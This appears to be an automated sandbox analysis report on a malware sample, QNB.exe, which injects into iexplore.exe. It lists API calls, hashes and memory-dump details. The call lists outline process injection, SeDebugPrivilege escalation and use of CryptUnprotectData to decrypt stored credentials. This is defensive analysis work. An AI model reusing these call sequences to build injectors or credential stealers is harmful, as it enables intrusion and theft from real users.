                                                                                                    • Opcode ID: c9c1317dcc9fd4b6bec7c78934aa9874b59481f114a69acd0372d82046c7b738
                                                                                                    • Instruction ID: 9db986e4c1c87645fc2994878dfad31a04b588078926c7b5e37c971dd7f7d723
                                                                                                    • Opcode Fuzzy Hash: c9c1317dcc9fd4b6bec7c78934aa9874b59481f114a69acd0372d82046c7b738
                                                                                                    • Instruction Fuzzy Hash: 4CC080831141A24555791438337435B55C70F4295073086742D2546749DBD58E4445D2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 022FD0BD, Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                                                    • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                                                                                                    • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                                                    • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 023020CD, Relevance: .0, Instructions: 5COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.80792180292.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4aa1e8760e4468cccab5301a68a3ccb3b13af2710bfea2abf0b86437d23c2669
                                                                                                    • Instruction ID: d443c0db12622c4a5dd1f0cd2b1cbac6f4c5155c753e1d18ff0899068fd1d2a4
                                                                                                    • Opcode Fuzzy Hash: 4aa1e8760e4468cccab5301a68a3ccb3b13af2710bfea2abf0b86437d23c2669
                                                                                                    • Instruction Fuzzy Hash: C5B002792516408FC696CE19C194F8073A4BB45A51BC15594E81197B15C268E9418950
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Analysis Process: Statement from QNB.exe PID: 3232 Parent PID: 1112 Statement from QNB.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 0087A177, Relevance: 1.5, APIs: 1, Instructions: 5memorynativeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • NtAllocateVirtualMemory.NTDLL(000007F8), ref: 0087A183
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000003.80967454629.0000000000875000.00000004.00000001.sdmp, Offset: 00875000, based on PE: false
                                                                                                    Similarity
                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 2167126740-0
                                                                                                    • Opcode ID: bb3e758da763b139eb582b6ce290e82a90abf0a3f2c6c8c1d57a9086f2b58e33
                                                                                                    • Instruction ID: 1b213048929f99b22b79e4b8c97a962a1f40ee5b236b36c9bd69e0c6b2996f65
                                                                                                    • Opcode Fuzzy Hash: bb3e758da763b139eb582b6ce290e82a90abf0a3f2c6c8c1d57a9086f2b58e33
                                                                                                    • Instruction Fuzzy Hash: EDA002B87891425BD5C4DBDC8849A1932945BC6746F9108A0B124DF1D4EE55E9005B52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00577B3F, Relevance: 1.7, APIs: 1, Instructions: 192threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateThread.KERNEL32(-78573BAB,-519BD1CB), ref: 00577B34
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.81016708320.0000000000577000.00000040.00000001.sdmp, Offset: 00577000, based on PE: false
                                                                                                    Similarity
                                                                                                    • API ID: TerminateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1852365436-0
                                                                                                    • Opcode ID: 64338d125c0aad81c9fabc7b3550b3ced50e5291e2d0277887bb5ff9c890c6e0
                                                                                                    • Instruction ID: 3f53d4a98ad35bb3a3f200bd6da3d57854d5c84bee76167326a1f3f023ea6c51
                                                                                                    • Opcode Fuzzy Hash: 64338d125c0aad81c9fabc7b3550b3ced50e5291e2d0277887bb5ff9c890c6e0
                                                                                                    • Instruction Fuzzy Hash: B951423129916EDFCB71ED24ACC0A66FB95AB1E271F2483A6CC654B4E7C732C84DD244
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00577A12, Relevance: 1.7, APIs: 1, Instructions: 189threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateThread.KERNEL32(-78573BAB,-519BD1CB), ref: 00577B34
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.81016708320.0000000000577000.00000040.00000001.sdmp, Offset: 00577000, based on PE: false
                                                                                                    Similarity
                                                                                                    • API ID: TerminateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1852365436-0
                                                                                                    • Opcode ID: 5473790ac147d006f36f4cd20c24e7aa9468c495d04f28ce15a54fc9d101a400
                                                                                                    • Instruction ID: 82a177cbeabc1861d0ed8f6f3618ad2fe770c1f2d7f75dab91a17db32b50e431
                                                                                                    • Opcode Fuzzy Hash: 5473790ac147d006f36f4cd20c24e7aa9468c495d04f28ce15a54fc9d101a400
                                                                                                    • Instruction Fuzzy Hash: 0051513019816E9FCB319E249CC0B66FB95AB1B231B2483E5CC654F4EBC732C84DD244
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00577A00, Relevance: 1.6, APIs: 1, Instructions: 106threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • TerminateThread.KERNEL32(-78573BAB,-519BD1CB), ref: 00577B34
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.81016708320.0000000000577000.00000040.00000001.sdmp, Offset: 00577000, based on PE: false
                                                                                                    Similarity
                                                                                                    • API ID: TerminateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1852365436-0
                                                                                                    • Opcode ID: b9c589c1d030756d1c1809714a7ae0ea0f5a717f461c43accdca73ee8947e6b2
                                                                                                    • Instruction ID: dd39b7f639efbf742f62a6b81b24ea4a321da38dc1de5851c1bc7b988edb3174
                                                                                                    • Opcode Fuzzy Hash: b9c589c1d030756d1c1809714a7ae0ea0f5a717f461c43accdca73ee8947e6b2
                                                                                                    • Instruction Fuzzy Hash: 7031267150831ACFDB308E24F894BA67F967F6A320F19C196CD8D4B266C3318D84DB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0087A160, Relevance: 1.5, APIs: 1, Instructions: 6registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyW.ADVAPI32(008BB934,00872594,000000FF), ref: 0087A174
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000003.80967454629.0000000000875000.00000004.00000001.sdmp, Offset: 00875000, based on PE: false
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 8b7b083ca594f552ff8a05f41a8a7216c190e9900f44d5fffb991d12afa87289
                                                                                                    • Instruction ID: 302ff302a86e5ce3a95a8d144c718bfab8f60620f978f07c49a3783070944efd
                                                                                                    • Opcode Fuzzy Hash: 8b7b083ca594f552ff8a05f41a8a7216c190e9900f44d5fffb991d12afa87289
                                                                                                    • Instruction Fuzzy Hash: A0A002507C234725D86551A60C13E771804BF94F06F534060B2F9E97CDDEDD8A016995
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Analysis Process: iexplore.exe PID: 1736 Parent PID: 3232 iexplore.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 00401364, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: #100
                                                                                                    • String ID: VB5!6&*
                                                                                                    • API String ID: 1341478452-3593831657
                                                                                                    • Opcode ID: 9b5013c4cf67569665f26d2c48c447d5ba9a3fcb56707d59ace42e3b0aeb6654
                                                                                                    • Instruction ID: b7f46b07fd2382989242c00de91e411bf3b00ebe0bc19311e73dd1aa04708b72
                                                                                                    • Opcode Fuzzy Hash: 9b5013c4cf67569665f26d2c48c447d5ba9a3fcb56707d59ace42e3b0aeb6654
                                                                                                    • Instruction Fuzzy Hash: 94E0536610E3C0AED3135B609A622053FB4AA4734170A84F7D9D0EA8F3C63C9888C33A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040CE30, Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 71cba679f7ad99be25a7cd36ba3732a393cf453f96187e8ab0eda7d50836c6e2
                                                                                                    • Instruction ID: fd7bf7fef8992ef2e6e9ccd912d44d70071294ca33ce019f73598511de6408bd
                                                                                                    • Opcode Fuzzy Hash: 71cba679f7ad99be25a7cd36ba3732a393cf453f96187e8ab0eda7d50836c6e2
                                                                                                    • Instruction Fuzzy Hash: CF01125588E3C59FD32393B04CA51613F609D0B28032E0AEBD4D6EF0E3D66D580AC36B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D874, Relevance: .0, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9f7a93f12f6ceac68c3c6e57f9da98a08758eb5ef389da310894da6bcec74716
                                                                                                    • Instruction ID: e9acff41310a612d4141351b175bce2eafd3288dbdb7fda07d373d2081b32fd3
                                                                                                    • Opcode Fuzzy Hash: 9f7a93f12f6ceac68c3c6e57f9da98a08758eb5ef389da310894da6bcec74716
                                                                                                    • Instruction Fuzzy Hash: 35E0484698E3C10FD31366A10C205502F71891764032A45EBD5A5DE5E3C85E8D0E873A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D036, Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ddec02d60ecac49bc21286b0f37acba873a846efdbf5481605bbb62840242978
                                                                                                    • Instruction ID: 4deff4bfb06445af4152e2ddde9cd1b592112ee6ed4779f82b465025d6fef90e
                                                                                                    • Opcode Fuzzy Hash: ddec02d60ecac49bc21286b0f37acba873a846efdbf5481605bbb62840242978
                                                                                                    • Instruction Fuzzy Hash: FEE0480098E3C19FD31393B408255612FB48847244B5E89EBD999DE0E3CA5E8C0FD336
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040CFB2, Relevance: .0, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4761dd2a8e6df04143fc0fb44877c9891ec621d7e69019f4f9925d0dd5c5fdc3
                                                                                                    • Instruction ID: e1ea6b055517d1e7239180d9e6af86da22ce10ec25c77aebebd11128acb11a82
                                                                                                    • Opcode Fuzzy Hash: 4761dd2a8e6df04143fc0fb44877c9891ec621d7e69019f4f9925d0dd5c5fdc3
                                                                                                    • Instruction Fuzzy Hash: 8FD0485058E3C29EC31343600C665622F728A0725031A0AEBD695DF1E3C96D480A87BB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D0F6, Relevance: .0, Instructions: 17COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: da0562bf17c4c4f36732c2b5164eb1f641243ebe8d5ab6b1f80788cdecbb45e8
                                                                                                    • Instruction ID: 4bf93f5148363bf18c72a930363c5483a9ebf0b62c1dbef03ccbe70fa8e34327
                                                                                                    • Opcode Fuzzy Hash: da0562bf17c4c4f36732c2b5164eb1f641243ebe8d5ab6b1f80788cdecbb45e8
                                                                                                    • Instruction Fuzzy Hash: 06D06C5498F3C19EC71353B40C645622F708A4724432E05EBD695DE1E3C86D9C0ED33B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D076, Relevance: .0, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.85673128439.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b7a700226b00a0c9ae91461f28642d5cbe539946352a884aa9ec8f07c843daf3
                                                                                                    • Instruction ID: b5bb26d9b2da3abdf8955492d2c9f8ecd773af7b928047d8870461a20f8ff6ec
                                                                                                    • Opcode Fuzzy Hash: b7a700226b00a0c9ae91461f28642d5cbe539946352a884aa9ec8f07c843daf3
                                                                                                    • Instruction Fuzzy Hash: 49D06C81D8E3C15FD31352B00C246102F709E17284B2A09FBD188DE1F3DA5E8E0EC32A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Analysis Process: iexplore.exe PID: 2300 Parent PID: 1736 iexplore.exeCOMMON

                                                                                                    Executed Functions

                                                                                                    Function 004049E6, Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 233librarymemoryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
                                                                                                      • Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(0041E568,00000104), ref: 0040442B
                                                                                                      • Part of subcall function 004043E4: _mbscpy.MSVCRT ref: 0040443E
                                                                                                      • Part of subcall function 004043E4: memcpy.MSVCRT ref: 004044BD
                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
                                                                                                    • memset.MSVCRT ref: 00404A2F
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F
                                                                                                      • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                                                                                      • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                                                                                      • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                                                                                      • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                                                                                      • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
                                                                                                      • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
                                                                                                    • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
                                                                                                    • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9
                                                                                                      • Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0
                                                                                                      • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                                                                                      • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                                                                                      • Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
                                                                                                      • Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                                                                                      • Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
                                                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
                                                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,0040428D,00000000), ref: 00404B55
                                                                                                    • WriteProcessMemory.KERNEL32(00000000,?,Function_00004185,00000400,00000000,00000000), ref: 00404B76
                                                                                                    • WriteProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404B8C
                                                                                                    • ResumeThread.KERNEL32(00000000,00000000,00000000,?,0040428D,0040428D), ref: 00404BB5
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00003A98), ref: 00404BC1
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00404BC8
                                                                                                    • memset.MSVCRT ref: 00404BE1
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,0040428D,?,000000A0,00000000), ref: 00404BFE
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00404C15
                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 00404C2B
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00404C43
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00404C51
                                                                                                    • VirtualFreeEx.KERNEL32(00000000,0040428D,00000000,00008000), ref: 00404C6A
                                                                                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C74
                                                                                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C7E
                                                                                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000), ref: 00404C88
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00404C8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProcVirtual$Handle$FreeProcess$Memory$AllocClose$ModuleWritememset$LibraryReadstrlen$??2@??3@DirectoryObjectOpenResumeSingleSystemThreadVersionWait_mbscpymemcpy
                                                                                                    • String ID: GetModuleHandleA$GetProcAddress$LocalFree$WriteProcessMemory$kernel32.dll
                                                                                                    • API String ID: 826043887-859290676
                                                                                                    • Opcode ID: 665ad1307490be50280a61e2e255cc2a615cdf92a4a5461d0867a563b363db31
                                                                                                    • Instruction ID: 453227f2aabe0250eee1d40a9044243133179be0bc8eed6658bb11275d9bd618
                                                                                                    • Opcode Fuzzy Hash: 665ad1307490be50280a61e2e255cc2a615cdf92a4a5461d0867a563b363db31
                                                                                                    • Instruction Fuzzy Hash: CA81F6B1901218BBDF21ABA1CC45EEFBF79EF88754F114066F604A2160D7395A81CFA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407C79, Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00407CDB
                                                                                                    • memset.MSVCRT ref: 00407CEF
                                                                                                    • memset.MSVCRT ref: 00407D09
                                                                                                    • memset.MSVCRT ref: 00407D1E
                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                    • strlen.MSVCRT ref: 00407D91
                                                                                                    • strlen.MSVCRT ref: 00407DA0
                                                                                                    • memcpy.MSVCRT ref: 00407DB2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                    • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                    • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                    • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                    • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410DE1, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00410DF0
                                                                                                      • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00410E02
                                                                                                    • GetProcAddress.KERNEL32(?,LookupPrivilegeValueA), ref: 00410E24
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?,?,LookupPrivilegeValueA,?,?,00000000), ref: 00410E34
                                                                                                    • GetProcAddress.KERNEL32(?,AdjustTokenPrivileges), ref: 00410E5A
                                                                                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,AdjustTokenPrivileges,?,?,00000000), ref: 00410E6B
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00410E78
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessTokenValue
                                                                                                    • String ID: AdjustTokenPrivileges$LookupPrivilegeValueA$SeDebugPrivilege
                                                                                                    • API String ID: 3328644959-164648368
                                                                                                    • Opcode ID: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                                                                                    • Instruction ID: 180035a187f8386c87a779d0175683d60653c8262eee481a5a772ffe12dd7b09
                                                                                                    • Opcode Fuzzy Hash: bcfb295028deb42d7034a1c1e26edc5f6458782d310d68dd3fa971f052d55e9a
                                                                                                    • Instruction Fuzzy Hash: D2117371900205FBDB11ABE5DC85AEF7BBCEB48344F10442AF501E2151DBB99DC18BA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404C9D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                                                                                    • LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: CryptUnprotectData$crypt32.dll
                                                                                                    • API String ID: 145871493-1827663648
                                                                                                    • Opcode ID: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                    • Instruction ID: 7870739769311804760c3d1e0253e2144152d34b250ce61cbbba51fe108a7f01
                                                                                                    • Opcode Fuzzy Hash: 2e6b38e55e542b86b2f912df5b090dd7434b38e1ebb6106688e0ae1187d66704
                                                                                                    • Instruction Fuzzy Hash: 01E012B06057108AE7205F76A9057837AD4AB84744F12843EA149E2580D7B8E440C798
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407898, Relevance: 6.1, APIs: 4, Instructions: 58filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                                                                                    • FindNextFileA.KERNEL32(000000FF,00000247,?,?,004042EE,?), ref: 004078CC
                                                                                                    • strlen.MSVCRT ref: 004078FC
                                                                                                    • strlen.MSVCRT ref: 00407904
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: FileFindstrlen$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 379999529-0
                                                                                                    • Opcode ID: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                    • Instruction ID: 3f72f9a190aab30f8f483bccc0fafde7a86c3084d5e1b238a9c8f95d2c3e0c3c
                                                                                                    • Opcode Fuzzy Hash: 2b827dd507cf4954e4e0e3644904d3df78e65a6b3ddb2711f2897f60a4f4153f
                                                                                                    • Instruction Fuzzy Hash: 1F1186B2919201AFD3149B34D884EDB77D8DF44325F20493FF19AD21D0EB38B9459755
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041208B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00412098
                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004120A9
                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004120B9
                                                                                                    • LockResource.KERNEL32(00000000), ref: 004120C4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                    • Instruction ID: 6eee99af0fd3847aa000c15d4e464fa532876ff6069f3449b7718533803959f6
                                                                                                    • Opcode Fuzzy Hash: f941057d9d473a3effe0424e98a75c568b709bef998aca64f808860bd509ea76
                                                                                                    • Instruction Fuzzy Hash: 0101C432600215AB8B158F95DD489DB7F6AFF8A391305C036ED09C6360D770C890C6CC
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C66A, Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 185windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                                                                                      • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                                                                                      • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                                                                                      • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040C6A7
